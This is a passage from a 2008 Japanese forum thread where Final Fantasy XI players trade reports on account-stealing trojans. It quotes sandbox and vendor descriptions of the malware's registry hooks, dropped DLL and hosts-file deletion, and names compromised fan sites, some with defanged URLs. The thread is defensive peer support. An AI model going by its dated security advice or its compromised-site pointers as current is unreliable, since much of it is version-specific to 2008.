クレカなら知らないけどウェブマネーなら課金せずに放っておけば良いんじゃない?

805 名前:既にその名前は使われています:2008/08/12(火) 13:32:25 ID:NGS22e+2
あとこのトロイ、シェル拡張として動作し、
hostsに危険サイトを片っ端から突っ込んでる人を乙らせるために
hostsを削除する模様。

Norman砂箱より。
[ Changes to registry ]
* Accesses Registry key "HKLM\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks".
[ Changes to filesystem ]
* Deletes file C:\WINDOWS\SYSTEM32\drivers\etc\Hosts.

806 名前:既にその名前は使われています:2008/08/12(火) 13:35:04 ID:8EW1feBj
RMTでギル買ったやつハックすりゃいいのにな。
周りに迷惑かけんなよほんとに。

807 名前:既にその名前は使われています:2008/08/12(火) 13:35:14 ID:17CWOzyq
>>804
クレカ支払い
カード会社に電話してみるかな…

808 名前:既にその名前は使われています:2008/08/12(火) 13:39:30 ID:GEprlb2+
OneCareはどうなの?使ってるけどあんまり聞かないからちょっと怖いなー

809 名前:既にその名前は使われています:2008/08/12(火) 13:44:42 ID:QXts6zsB
>>803
正式に退会しないで課金だけ止めてるだけだと、知らない間にハック受けて
業者に自分のキャラ使われることもあるかも
もちろん課金は盗んだクレカで
もうやる気無いんだったらキャラ削除して、退会手続きして、PCからPOL以下全部アンインストール推奨

810 名前:既にその名前は使われています:2008/08/12(火) 13:48:35 ID:QXts6zsB
>>772
できたら>5のテンプレで報告してくれると嬉しいけど
よくわかんなかったら>>12の感染の前兆症状があったかどうかだけでも
教えてくれないかしら

811 名前:既にその名前は使われています:2008/08/12(火) 13:50:41 ID:OeSg/N81
一回ハック受けると、ウィルスチェックしても危ないですか?


812 名前:既にその名前は使われています:2008/08/12(火) 13:53:16 ID:QXts6zsB
どういう意味で言ってるのかイマイチ分からんけど
安全で無いことは確かです

813 名前:既にその名前は使われています:2008/08/12(火) 13:53:39 ID:TWCBrm5G
>>811

あぶなくないから安心してまたハックされてね

814 名前:既にその名前は使われています:2008/08/12(火) 14:12:41 ID:Kn/MThG4
>>811
戸締り悪くて泥棒に入られた家なのですが、また泥棒は入りますか?

815 名前:既にその名前は使われています:2008/08/12(火) 14:17:08 ID:n014sXOV
1039045744のjsのやつもフラッシュプレイヤーのときみたいに
結構被害でるんじゃないかこれ

816 名前:既にその名前は使われています:2008/08/12(火) 14:26:48 ID:xK4vrGyy
1039045744もFlash Playerの脆弱性を突いて感染させる

817 名前:既にその名前は使われています:2008/08/12(火) 15:01:39 ID:IR1yNkJm
>>810
感染の兆候なのかどうかわからないけれど
その日に限りFFがフリーズしてました。

それとシャットダウンすると必ずエラーが出ていました。
>5のテンプレもわかる範囲で書いたほうがいい?

818 名前:既にその名前は使われています:2008/08/12(火) 15:04:49 ID:RtRMH9Nl
>>808
怖いって言うか地雷とか不発弾の類。

819 名前:既にその名前は使われています:2008/08/12(火) 15:12:23 ID:MxQbHCid
アカハック被害にあいました。5年も愛着あったキャラだったのに・・・
別アカで入ってみたら見事に自分のキャラがサーチでひっかかった。
スンゲーショックです。。。みんなも気をつけてくでー
昨日入った怪しいサイトあるんだがURLとかは張ったらまずい?

820 名前:既にその名前は使われています:2008/08/12(火) 15:13:11 ID:qnU74Hfv
>>819
注意書きして貼ればOK

821 名前:既にその名前は使われています:2008/08/12(火) 15:13:58 ID:6IQ3Sixp
.を■に変えたりすればいいんでないかい

822 名前:既にその名前は使われています:2008/08/12(火) 15:14:20 ID:Scyc/l7c
>>819
ドットを■にするなりして直リンにしなければおk

823 名前:既にその名前は使われています:2008/08/12(火) 15:14:20 ID:Zh7f1fZT
>>819
.を■に変えて報告頼む。どういう経由でそんなサイトに入ったの?

824 名前:既にその名前は使われています:2008/08/12(火) 15:19:38 ID:MxQbHCid
www■geocities■jp/ff11info110

Yahooでff11でボーっと検索していろいろ見てたら踏んじゃった。ジオシティー
だから関係ないのかな?もし関係なかったらすんません。
救済用チャットつながらない〜


825 名前:既にその名前は使われています:2008/08/12(火) 15:21:34 ID:5fYZXP6e
まじか・・・・これじゃネットみれんな

826 名前:既にその名前は使われています:2008/08/12(火) 15:24:06 ID:wqkDLlV8
新種でたから信用できるサイトでも不要意に踏まないほうがいいよ


827 名前:既にその名前は使われています:2008/08/12(火) 15:29:22 ID:NGS22e+2
>>824
アカハック関係ないね。
athletaとかいうサッカー関係のブランド(?)の
アフィサイトへの誘導かと。

828 名前:既にその名前は使われています:2008/08/12(火) 15:30:56 ID:0y8Yw/BW
WEB閲覧用にコンシューマ機でも買おうかと思ったけど、
むしろそっちでFFしたほうがいいかw

829 名前:既にその名前は使われています:2008/08/12(火) 15:32:01 ID:gM70EMnp
便利ガイドもジオシティーだったな。

830 名前:既にその名前は使われています:2008/08/12(火) 15:36:45 ID:MxQbHCid
関係なかったか〜、athletaさんすんません。ちなみに不正アクセスチャット
つながりました。現在45人待ち。多すぎ。

831 名前:既にその名前は使われています:2008/08/12(火) 15:39:59 ID:3Sv+etv8
45人・・・

832 名前:既にその名前は使われています:2008/08/12(火) 15:49:33 ID:NGS22e+2
>>829
netbenriはXREAだったよ。今回やられて(?)sakuraに移転したけど。

833 名前:既にその名前は使われています:2008/08/12(火) 16:06:22 ID:8jOBXpXl
>>808
意外にもMicrosoftは、垢ハックトロイの対応が早い。
797の対応状況見てみ。

834 名前:既にその名前は使われています:2008/08/12(火) 16:07:52 ID:kYz4Nzr2
XREA以外のレンタルサーバにハックかけられる可能性だって
捨てきれないんだよな。・゚・(ノД`)・゚・。
大手プロバイダ、ポータルサイト系の狙われたらどうしよう;

835 名前:既にその名前は使われています:2008/08/12(火) 16:08:38 ID:jfUGeK5Z
>>791
>沢山いる
沢山いるか?報告みてもほぼパス保存しか見当たらないわけだが
手打ちって言っても昔からではなく最近の被害でてから手打ちにしてたりが多いみたいだし
当然パス抜かれた後にWindowsUpdateとかしてもあれなわけで


836 名前:既にその名前は使われています:2008/08/12(火) 16:12:22 ID:WVf5oSlV
PCでプレイした後PS2でログインしてパス変えて落ちるw
そのうち復活の呪文が違いますとか言われそうで怖いことは怖い

837 名前:既にその名前は使われています:2008/08/12(火) 16:20:04 ID:gM70EMnp
>>835
え?何時代遅れなこと言ってんの?
フレイヤに巻き込まれて3ヶ月前からタイムワープしてきた人ですか?!

838 名前:既にその名前は使われています:2008/08/12(火) 16:22:52 ID:R/BMTcnj
>>835
見つかったマルウェアの仕組みを理解してから書き込もうねw


839 名前:既にその名前は使われています:2008/08/12(火) 16:26:33 ID:NGS22e+2
英Sophosより返答。
Troj/Lineag-DW includes functionality to access the internet and communicate with a remote server.
When first run Troj/Lineag-DW creates the file <System32>\KarnaeghDrv.dll.
The file KarnaeghDrv.dll is registered as a COM object and ShellExecute hook, creating registry entries under:
HKCR\CLSID\{DA0A0B68-2F3C-51D2-A901-938AE036D21A}

KarnaeghDrv.dll またお前か

840 名前:既にその名前は使われています:2008/08/12(火) 16:30:24 ID:7gi2i432
>>835
ID/PASSをクライアントに記憶させないほうが良いとされているのは、保存されているファイルを盗み出す手口に対して有効だからなわけだけど。
そこを対策してない層にFlashPlayerの更新やOSを更新をしてない人が多く居たって事じゃないかなー。

出張やっと終わったわけだが、なんか新しい手法とかでてきたんだろうか。
Xrea鯖改ざんして仕込んでるみたいだけど、ドロッパ食わせるのはまたFlashPlayerの脆弱性突いてるやつかしらん?

841 名前:既にその名前は使われています:2008/08/12(火) 16:34:52 ID:cPfiN4NV
しかし、これだけ亜種が出るとアンチウイルスはほぼ意味ないな

正にいたちごっこだ、こっちは検体見つけないとダメな時点で中華優勢だな

842 名前:既にその名前は使われています:2008/08/12(火) 16:37:34 ID:7gi2i432
元来アンチウィルスソフトってそういうもんだよ。
だからこそファイアヲールやHIPSで挙動を絞ってやることが重要なわけでw

843 名前:既にその名前は使われています:2008/08/12(火) 16:38:42 ID:MxQbHCid
824です。いま別キャラでログインしてとりあえずアカ停止してもらったよ〜
GMに聞いたら復旧までに1ヶ月 以 上 だそうだ・・・長いね・・・

ff関連で昨日見たサイトなんだけど、ほかに怪しいのなかったんだけど、
アバストしたらトロイがいますた。PCは使わないほうがいいのかもね。

844 名前:既にその名前は使われています:2008/08/12(火) 16:40:13 ID:AxdPCnw5
>>836

オレもそれやってるわ。
月末処理のときとかパスワード変えれなかったりすると心配すぐる。

845 名前:既にその名前は使われています:2008/08/12(火) 16:41:32 ID:NGS22e+2
>>840
うん。

846 名前:既にその名前は使われています:2008/08/12(火) 16:42:07 ID:m+cUPiBv
>>843
今は怪しく無いサイトでも書き換えられているかなんとも言えないし、
パス抜かれたのも昨日今日とも限らないからね
できたらテンプレ通り報告して欲しい

847 名前:既にその名前は使われています:2008/08/12(火) 16:45:33 ID:NGS22e+2
>>843
アカハックする側も当然GM並みに行列待ちになるんで
今日抜かれたから昨日見たサイトとは限らないよ
(週一くらいでまとめて処理する業者もいた)。

848 名前:既にその名前は使われています:2008/08/12(火) 16:46:31 ID:Su7jRKR1
ネット環境とFF11を完全に分けるしかないって状況に追い込まれそうだね。

849 名前:既にその名前は使われています:2008/08/12(火) 16:52:00 ID:7gi2i432
>>843
対応乙。落ち着いたらテンプレ報告と、検出された定義名、ファイル名を書き出してもらえると状況把握しやすいかなー。

>>845
そうかー、ありがとう。KarnaeghDrv.dllは複合垢パク仕様なんだねえ。
前にも何度かKarnaeghDrv.dllの報告あったし、被害にあったのにwzcsvbxm.dllが無かったって人のはやっぱりこいつなんだろうねー。
もちろん更に以前の手法でやられちゃったって可能性もあるけどw

850 名前:既にその名前は使われています:2008/08/12(火) 17:02:50 ID:AZsCH7Z5
あえて情報サイトを見ないという選択

851 名前:既にその名前は使われています:2008/08/12(火) 17:07:34 ID:Teo+H7oX
情報サイトを開く前にURLでググッてページのデータを
丸ごとダウンロードしてネット回線切断して
落としたデータを調べてから見ればいいんじゃねーの?

852 名前:既にその名前は使われています:2008/08/12(火) 17:11:20 ID:Pv5GVtZw
URL開く前に ttp://so.7walker.net/guide.phpで調べてる

853 名前:既にその名前は使われています:2008/08/12(火) 17:16:38 ID:NGS22e+2
ソースチェッカーで改ざん前のキャッシュを見て安心するのですね、わかります。

854 名前:既にその名前は使われています:2008/08/12(火) 17:23:34 ID:QbGE353/
あれ?ページ上部のURL入れてCHECKボタン押すのもキャッシュ検索だったのか?
うわ〜勘違いしてたんかorz・・・・

855 名前:既にその名前は使われています:2008/08/12(火) 17:24:23 ID:k+v1/xjX
>>849
おかえりおつかれちゃーん
>>850-851
そもそも何か動作をさせる(掲示板に書き込む、文字が動く、音が鳴るEts・・・)のを逆手にとってアカハックに利用してるのが今回の元凶。
だから、企業のHPの方が数段危なかったりする。(この前も個人情報ぬかれまくってたしなw)
純粋な、素人がメモ書きしたHPほど安全なのだよ。
まあ、ダウンロードの意味わかってたらこんな質問出てこないけどな。

856 名前:既にその名前は使われています:2008/08/12(火) 17:25:50 ID:MxQbHCid
824です。分かるとこまででテンプレ報告。元に戻るまでミスラでも作って
あそんでるよ〜。
●気付いた日時 2008/8/12
●不審なアドレスのクリックの有無 特に思い当たらないが、よく見るのはDAT関係とか攻略サイト。
●他人が貴方のIDを使用したことが一度でもあるか(Yes/No)  No
●ID・Passの認証方法(POLに保存/自動ログイン/手打ち、途中で変更した場合はその履歴、例:自動ログイン→○月○日から手打ち、等) 自動ログイン
●Pass変更の履歴(した/していない・していたならパスの最終更新日、等)  1年前
●他人が貴方のPCを使う可能性の有無(Yes/No)  No
●ツールの使用の有無:Yes/No・Yesの場合はそのToolの説明 Yes  Altana View, FF11 model viewer, Altana Cubby
●ネットカフェの利用の有無:Yes/No No
●使っているOS(SP等まで書く) WINDOWS XP home edition
●使用ブラウザ(バージョン等まで分かれば書く) IE SP2
●WindowsUpdateの有無(最終更新日、等) 不明。更新のお知らせが来たらする程度。
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し) RealPlayerv10.0 FlashPlayer 不明
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)ノートン 2004
●その他のSecurty対策(Spybot S&D、ルータ、等) とくになし

857 名前:既にその名前は使われています:2008/08/12(火) 17:27:18 ID:MxQbHCid
つづき
●ウイルススキャン結果(たとえば カスペルスキーオンラインスキャンでC:\WINDOWS\System32\○○.DLLをTrojan.W32○○として発見 等)
DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
A0085077.exe Win32:Agent-AWB [Adw]
1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]
●スレログやテンプレを読んだか(Yes/No/今から読みます) 今から読みます
●hosts変更(有/無・有りの場合は最終更新は何時ごろか) ナシ
●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか) ナシ
●その他情報・症状など(書ききれない場合は次レスで書いてください) パスワードを勝手に変更されていた。

858 名前:既にその名前は使われています:2008/08/12(火) 17:43:29 ID:bkms+uTk
>>857 のDaemonToolsなんたかが、COMODO Firewallでスキャンしたらかかったわ
俺も危うかった・・・・

PG2導入 SypBot Ad-Ware SpywareBlaster ノートン先生までで安心してたけど
WindowsDefender導入してなかったし、WindowsFirewallがオフってた・・・
WindowsFirewallはノートン先生と競合するからオフった記憶があるんだけど、ONにして今のところ問題ないようだ

ところで本題
COMODO Firewallを導入してる方情報をください。
POLログイン>FF開始、FFキャラ選択画面>キャラ読み込み という一連の動作で
「キャラ読み込み」だけができずにサーバー応答なしエラーで先に進めなくなってしまいました。
なにか上手い設定方法ご存知でしょうか。ご教授いただけますか?



859 名前:既にその名前は使われています:2008/08/12(火) 17:46:45 ID:7gi2i432
>>857
1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]

こいつらは専ブラのログかなー?
だったらログにウィルスコード貼られたやつに反応してる可能性があるかも。

DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
A0085077.exe Win32:Agent-AWB [Adw]

こいつだけど,DaemonToolsをPCにインスコしてたりしないかなー?


860 名前:既にその名前は使われています:2008/08/12(火) 17:48:14 ID:TI+p5+DZ
届いたかどうか心配するのもあれなんでコンビニからクロネコヤマトで書類送ってみた


861 名前:既にその名前は使われています:2008/08/12(火) 17:56:01 ID:MxQbHCid
824です。

>>859
2ちゃんターボのログフォルダにありました。

862 名前:既にその名前は使われています:2008/08/12(火) 17:58:42 ID:7gi2i432
>>858
ちゃんと>>10の通りにしてる?
それで問題なくプレイできているよー。

ちなみにアプリケーションルールは上から下に適用されていくので、一番下にはAllDenyいれるの忘れずに。
それでルール外の接続は全て拒否されるよ。


863 名前:既にその名前は使われています:2008/08/12(火) 18:07:13 ID:bkms+uTk
>>862
ありがとう。再設定して参ります。

864 名前:既にその名前は使われています:2008/08/12(火) 18:07:30 ID:6XbwNLV3
FC2ブログやってるんだが、感染確認したので削除した。
これって俺が持ち込んじゃったのか?
それともサーバー側が汚染されてるってこと?

865 名前:既にその名前は使われています:2008/08/12(火) 18:11:17 ID:qjegPAtA
>>864
テンプレに混入されるタイプ?
どういうのだったか教えてほしい

866 名前:既にその名前は使われています:2008/08/12(火) 18:11:52 ID:7gi2i432
>>861
んじゃそれはスレ内に貼られたウィルスコードに反応してる可能性がたかいねー。

DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
これだけどデーモンツールだと思うんだけどな。
仮想ドライブ作るソフトいれてないかなあ?

A0085077.exe Win32:Agent-AWB [Adw]
これはよくわからないけど、定義名同じだしねえ・・・

867 名前:既にその名前は使われています:2008/08/12(火) 18:25:52 ID:6j+llbMJ
デーモンツールは少し前のバージョンまでインストーラにアドウェア入ってるよ。
インストール時に拒否できるけど。

最近のだと入ってないはず。

ちなみにFFには関係ないアドウェア。

868 名前:既にその名前は使われています:2008/08/12(火) 18:34:45 ID:7gi2i432
>>867
[Adw]っていってるし、アドウェアだとは思うけどねえ。
861が垢パクされた原因は他にあるんじゃないかなー?
スレざっと読んでみたけど最新種はまだ検出率悪かったよね。

869 名前:既にその名前は使われています:2008/08/12(火) 18:37:53 ID:6i/6tig2
>>856
●アンチウイルスソフト(たとえば NortonInternetSecurity2008 等の名称、及びパターン更新日)ノートン 2004

ノートンだとFFのパス抜きは検知できないかもしれない。
>>115のカスペオンラインスキャンした方がいいかも。

DaemonTools_WhenUSave_Installer.ex Win32:Agent-AWB [Adw]
⇒デーモンツールのアドウェア

A0085077.exe Win32:Agent-AWB [Adw]
⇒デーモンツールのアドウェア(システムの復元領域か、インストーラーの残骸か

1161130908.dat Win32:Mhtplo-26 [Trj]
1152100569.dat Win32:Mhtplo-26 [Trj]
⇒2chのログ

870 名前:既にその名前は使われています:2008/08/12(火) 18:38:52 ID:7gi2i432
>>856
●FlashPlayerとRealPlayerのバージョン(更新日時をわかる範囲で・未導入であれば無し) RealPlayerv10.0 FlashPlayer 不明

取りあえず↓でバージョンを確認してきてねー。現在の最新バージョンは9.0.124.0でそれ以前のものは脆弱性持ち。
十中八九ここだとは思うけど、食わせる為の口は.
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

871 名前:既にその名前は使われています:2008/08/12(火) 18:40:20 ID:6i/6tig2
>>868
アンチウィルスが古いし更新してるかも怪しいので、検出できてない可能性が高い。
Daemon toolsのアドウェアもアレだけど、直接的なのはスキャンからすり抜けてるだけじゃないかなぁ。

872 名前:既にその名前は使われています:2008/08/12(火) 18:41:25 ID:7gi2i432
>>869
ふと思ったけど、ノートン2004ってまだモジュールウpデトとかパターン更新されてんの?

873 名前:既にその名前は使われています:2008/08/12(火) 18:41:57 ID:6i/6tig2
>>872
ワカンネ
多分これが原因で検出できてないんだと思う。

874 名前:既にその名前は使われています:2008/08/12(火) 18:43:24 ID:cPfiN4NV
そもそも更新の金払ってるのかさえ怪しいな

875 名前:既にその名前は使われています:2008/08/12(火) 18:45:13 ID:BFURx5Gi
ところでノートン2004ってまだパターンファイルの更新とかあるの?

>>860
メール便?いいねぇ
知識として知っておくといいけどもし別口で郵便で送るのなら、窓口で「配達記録」でと言えば追跡かけられるようになるよ
基本運賃+210円(2008年現在)になるけどね

876 名前:既にその名前は使われています:2008/08/12(火) 18:46:37 ID:7gi2i432
とりあえず>>824 ID:MxQbHCidはミスラちゃん作って遊ぶ前に一度PCをクリンスコしたほうがいいよ。
今検出されたものは垢パクに関係なさそうだし、まだ垢パクマルウェアは絶賛活動中の可能性も高いしね。

877 名前:既にその名前は使われています:2008/08/12(火) 18:51:21 ID:2PuZHXex
もうノートン2004のサポート期限過ぎてるよ。

878 名前:既にその名前は使われています:2008/08/12(火) 19:10:26 ID:KgMAI+rd
ノートンのパターンファイルは共用だったような希ガス

879 名前:既にその名前は使われています:2008/08/12(火) 19:11:33 ID:6i/6tig2
>>878
それ以前にそこまで古いのを使ってるってことはパターン更新してるかどうか…

880 名前:既にその名前は使われています:2008/08/12(火) 19:13:52 ID:Md2lTOOT
http://www◆veldo◆net/item_223.html

> ウイルス・・・
> http://www.geocities.jp/pehchunpm/mondai_XREA.htm
> http://sb.xrea.com/showthread.php?t=12960
> xreaが再び改竄受けてる模様。
> もうだめかもしれん・・・
> で、別にどうでもいいやん、って話なんですけど、
> 非常に言いにくいんですが、どうもこのブログも改竄受けてた模様。
> 見知られないタグ(javascriptの出力)が埋め込まれてました。
> 証拠とか見せてる問題じゃないので、即刻修正しました。
> flashが最新版の場合は別に問題ないそうですが、一応ウイルスチェックしてる途中です・・・
> 8/2以降、このブログ見た人は、一応ウイルスチェックしたほうがいいかも。「かも」じゃなくてしたほうがいいね。
> ていうかブログなんだからphp出力のはずなのに・・
> と思うかもしれませんが、見事にテンプレートが改竄受けてたみたいです。もうやだ・・・

ジョブテンプレ・マップガイド以外でも改竄されてるとこはありそうなふいんき(なぜかry

881 名前:既にその名前は使われています:2008/08/12(火) 19:14:16 ID:QXts6zsB
>>856-857
テンプレ乙
●FlashPlayerは必ず更新しておきましょう
十中八九最新版では無いとみたぜ
●アンチウィルスは最新版にするか、金払うのがイヤならせめてAvast!あたりいれる
サポート切れてるウィルスソフトなんて意味ナシ
●パス保存ダメ!ゼッタイ!
少なくとも以上3点やらないと新キャラのミスラもハックされて終わる

882 名前:既にその名前は使われています:2008/08/12(火) 19:18:08 ID:MxQbHCid
824です。
すいません、ノートンでなくてアバストさっきDLしてスキャンした結果
がテンプレです。書き込み不足ですいません。

>>870 Flash playerはWIN 9,0,115,0でした。

883 名前:既にその名前は使われています:2008/08/12(火) 19:19:19 ID:qjegPAtA
>>882
アウアウです。可及的速やかに更新を
ちなみにブラウザごとにやる必要があるからね。OperaとかIEとか

884 名前:既にその名前は使われています:2008/08/12(火) 19:20:54 ID:cPfiN4NV
>>882
どっちにしてもすでにアウトです。
PS2でやらないとダメなくらいアウツです。

885 名前:既にその名前は使われています:2008/08/12(火) 19:21:31 ID:KgMAI+rd
>>879
確か、いつのバージョンからかWin2kをサポートから切った時に
昔のバージョンをオンラインで売ってたような気がするから、使ってる奴は
使ってる気もする
まあ普通は乗り換えるが

886 名前:既にその名前は使われています:2008/08/12(火) 19:23:29 ID:H9m9iHDf
>>882
そのバージョンは脆弱性持ちなんだよー。残念だったなあ;
垢パクウェアの最新種の状況が↓だし,現時点ではAvastも検知できないみたいだからなー。
http://www.virustotal.com/analisis/ccc234390e5b7a6c342d589bf2a33038

カスペルスキーオンラインスキャンしてきて結果貼ってくれると嬉しいかしらん。

887 名前:既にその名前は使われています:2008/08/12(火) 19:25:56 ID:Ogkbnhca
俺もゲームシーフに感染してたわ
カスペで削除したけど

888 名前:既にその名前は使われています:2008/08/12(火) 19:26:27 ID:RtRMH9Nl
「ウイルスセキュリティZERO」に脆弱性、スキャン不能の状態に
ttp://internet.watch.impress.co.jp/cda/news/2008/08/12/20564.html
発見された脆弱性は、ファイルのスキャン処理において、
細工された圧縮ファイルを適切に処理できないために、
DoS状態になるというもの。この脆弱性が悪用されると
スキャン処理が停止し、以降ウイルスが検知できなくなってしまうという。

889 名前:既にその名前は使われています:2008/08/12(火) 19:28:41 ID:LIOX+9Uh
>>888
>「ウイルスセキュリティZERO」月額サービス
更新料かからないから多少アレでも目をつぶるようなソフトなのに
毎月お金取られるって一体・・・

890 名前:既にその名前は使われています:2008/08/12(火) 19:49:59 ID:fz5AwyHu
>>880
そこも独自ドメインだけどxreaだの・・・

891 名前:既にその名前は使われています:2008/08/12(火) 20:48:07 ID:NGS22e+2
>>880
ping veldo.net
210.196.169.201
ping -a 210.196.169.201
s329.xrea.com

892 名前:既にその名前は使われています:2008/08/12(火) 21:01:33 ID:9Hi+f4m9
ギコナビからJane Styleに変えた。
Jane Styleのサイトがxreaだった・・・

893 名前:既にその名前は使われています:2008/08/12(火) 21:04:39 ID:lmqu7Ut1
もう1カ所発見。形跡がないけど・・・。

http://idohorisan.so.land.to/blog/2008/08/post-4.html

> アカウントハック多いなぁ
>
> つい先日登録させてもらったFF11のリンク集サイト http://ffxiweb◆com/ にアクセスしたら
>
> 「Final Fantasy XI Web Portal」
> 罠サイトへ誘導されると思われるスクリプトが埋め込まれていたようです。
> 大変ご迷惑をおかけいたしました。
> セキュリティソフトで、私のサイトにアクセスしたパソコンをスキャンしてみましたが、なにも出てきませんでしたが、
> 念のため、アクセスされたかたは、セキュリティソフトなどでの対策をお願いいたします。
> (近日中に復旧予定です。)
> 管理人 じゅんたる
>
> となっていました。
>
> 登録された直後だったのでびっくり。。。。でもないか
> もうどのサイトでも罠スクリプトの埋め込みの脅威に晒されてるということですね。

894 名前:既にその名前は使われています:2008/08/12(火) 21:13:54 ID:iG74Gl8f
一番の対策は自動ログイン機能を廃止することじゃね。

895 名前:既にその名前は使われています:2008/08/12(火) 21:24:23 ID:z3hYURcI
>>894
いつの時代の話してんだ?

896 名前:既にその名前は使われています:2008/08/12(火) 21:25:43 ID:Kn/MThG4
まるで理解していない・・・

897 名前:既にその名前は使われています:2008/08/12(火) 21:35:04 ID:minb4bI1
>>892
窓の杜もあるんよ(・ω・)
ttp://www.forest.impress.co.jp/lib/inet/browser/typclbrwsr/janestyle.html

898 名前:既にその名前は使われています:2008/08/12(火) 21:40:40 ID:7k4o+Q0T
これからはDNSスプーフィングですよー。
もうサーバに関係なくやばいかも。

899 名前:既にその名前は使われています:2008/08/12(火) 21:42:02 ID:9Hi+f4m9
>>897
(´;ω;`)ウッ…

900 名前:既にその名前は使われています:2008/08/12(火) 21:46:53 ID:80E9NlRL
>>894
進化しろよ

901 名前:既にその名前は使われています:2008/08/12(火) 21:50:49 ID:RtRMH9Nl
進化するとなるとワンタイムパスワードとか固定IPによるIP決め撃ちとか
スクエニ側が頑張る方向になるのかな?

退化方面ならPS2や箱○使うと言うユーザーサイドの諦めか?

902 名前:既にその名前は使われています:2008/08/12(火) 21:51:18 ID:QXts6zsB
894は強制的にパスワード保存をなくすって言いたいんじゃねえの?

903 名前:既にその名前は使われています:2008/08/12(火) 21:54:13 ID:MDw2n0Nz
GMの中に黒幕が居るって?

904 名前:既にその名前は使われています:2008/08/12(火) 21:55:19 ID:RJZM05yM
FF11WIKIの過去クエの所みてたらPGが数分にわたってホンコンIPブロックしてた 
やばそうだから気をつけて

905 名前:既にその名前は使われています:2008/08/12(火) 22:00:17 ID:RtRMH9Nl
>>903
いるのは黒幕じゃなくて手下だろw

・・・sagesundiのリンクシェルコミュニティβは確かに酷すぎるけどな。

906 名前:既にその名前は使われています:2008/08/12(火) 22:04:28 ID:yLwkK/qW
PG2が222■186■190■13、14、16を弾いたから何事かと思ったぜ。

カスペ日本のアップデートサーバー混雑しすぎwww

907 名前:既にその名前は使われています:2008/08/12(火) 22:05:59 ID:qjegPAtA
ある意味このスレはカスペの販促スレだからなぁ
去年からの騒動で導入した人も相当数居そうだ
俺自身はNOD32だけどな。

908 名前:既にその名前は使われています:2008/08/12(火) 22:09:07 ID:z3hYURcI
>>902
そうとった上でなおほとんど意味がないと言っている

909 名前:既にその名前は使われています:2008/08/12(火) 22:12:33 ID:QXts6zsB
やらんよりマシだと思うけどな
この期に及んでまだ保存してる人多数って事考えると
更新をやってないとかはもうどうにもならんけど

910 名前:既にその名前は使われています:2008/08/12(火) 22:13:35 ID:q+0yzMWS
ヤマトメール便は記録も付いて封書サイズなら80円なんだぜ

911 名前:既にその名前は使われています:2008/08/12(火) 22:19:00 ID:AZsCH7Z5
>>906
やっぱり混雑しているのは俺だけじゃなかったかw

912 名前:既にその名前は使われています:2008/08/12(火) 22:19:30 ID:0yYcUu2r
証明書は信書にあたるから気をつけてね
ttp://www.post.japanpost.jp/question/57.html

913 名前:既にその名前は使われています:2008/08/12(火) 22:23:25 ID:UAcQ24qQ
>>906
ありがとおーwwww
自分のPG2もそのIPをブロックしてて、なんだこりゃと思ってたwww

914 名前:既にその名前は使われています:2008/08/12(火) 22:24:59 ID:NGS22e+2
>>907
言及するの忘れてごめんね。
>>797 × NOD32

915 名前:既にその名前は使われています:2008/08/12(火) 22:25:55 ID:P7uZgI1e
しかし、メール便では信書は遅れない、と法で決められていた筈。
更にメール便は、以前より改善されたとはいえ配達に関するクォリティが低すぎる。
基本的になくなっても後悔しないものを送るに使う手段であろう。

だからそれでも使いたいなら自己責任だわな。貴重なアカウントを守りたいと思うなら
数百円を節約する為だけで微妙な橋を渡るべきではないと思う。

信書のガイドライン
http://www.soumu.go.jp/yusei/shinsho_guide.html

916 名前:既にその名前は使われています:2008/08/12(火) 22:26:13 ID:qjegPAtA
>>914
分かってて使ってるから気にしないでくれ
会社で使ってるからこれが好きで好きで仕方が無いのだよ

917 名前:既にその名前は使われています:2008/08/12(火) 22:30:47 ID:NGS22e+2
>>916
検体は送っといたよ。初代のすら対応してくれんけど(7日に送付)。
ttp://www.virustotal.com/analisis/a4850a70087d7fddf8388485db34261f

918 名前:既にその名前は使われています:2008/08/12(火) 22:31:52 ID:/U4qZfce
ttp://www.virustotal.com/jp/analisis/98bf5aa320406471158a980871cded82

こんなのがあったんですけど、8/5に更新されてるファイルで
C:\WINDOWS\ServicePackFiles\i386にあるってことは
WindowsUpdateのファイルかな?ってことは誤検出でOK?

919 名前:既にその名前は使われています:2008/08/12(火) 22:33:51 ID:NGS22e+2
>>918
いくらなんでも誤検知じゃないか?
不安なら逆コンパイルしてexe抽出して投げてみ。

920 名前:既にその名前は使われています:2008/08/12(火) 22:41:11 ID:NGS22e+2
というかうちの同名ファイル投げたらハッシュ一緒だった。誤検知。

CHMバラしてみたい人は参考までにどうぞ。
ttp://www.google.co.jp/search?hl=ja&q=%22hh.exe%22+%22-decompile%22
往年の「花の雫」がCHMにexeを仕込む手法を使ったことがある
(いまどきこの穴が残っているPCはほとんど無いと思われる)。

921 名前:既にその名前は使われています:2008/08/12(火) 22:41:18 ID:6i/6tig2
>>918
1社だけだし、.chmだから誤検知だろう。

922 名前:既にその名前は使われています:2008/08/12(火) 22:46:04 ID:/U4qZfce
>>919->>921
気にしないことにした、ありがとでした。


923 名前:既にその名前は使われています:2008/08/12(火) 23:03:17 ID:7gi2i432
FlashPlayerやらちょっと気取った手法だけにに気を取られていると,アーカイブ偽装exeなんかにコロっと引っかかったりするから注意せねばなw
なにしろ俺がさっき胡散臭いメールで送られてきた奴にホイホイ引っかかってもうたわw

924 名前:既にその名前は使われています:2008/08/12(火) 23:11:24 ID:MxQbHCid
824です。

>>886
カスペルスキーしてみました。
C:\WINDOWS\SYSTEM32\smart.dll 感染: Trojan-GameThief.Win32.WOW.bht
これかぁぁ( ; ゚Д゚)
もうクレカとかやばそうだから再インスコしたほうがよさそうですね。カード
とめます・・


925 名前:既にその名前は使われています:2008/08/12(火) 23:18:40 ID:NGS22e+2
>>924
誤検知の例もあるからVirusTotalに投げて貼ってちょーだい

926 名前:既にその名前は使われています:2008/08/12(火) 23:29:21 ID:0yYcUu2r
windowerのフォーラムによれば
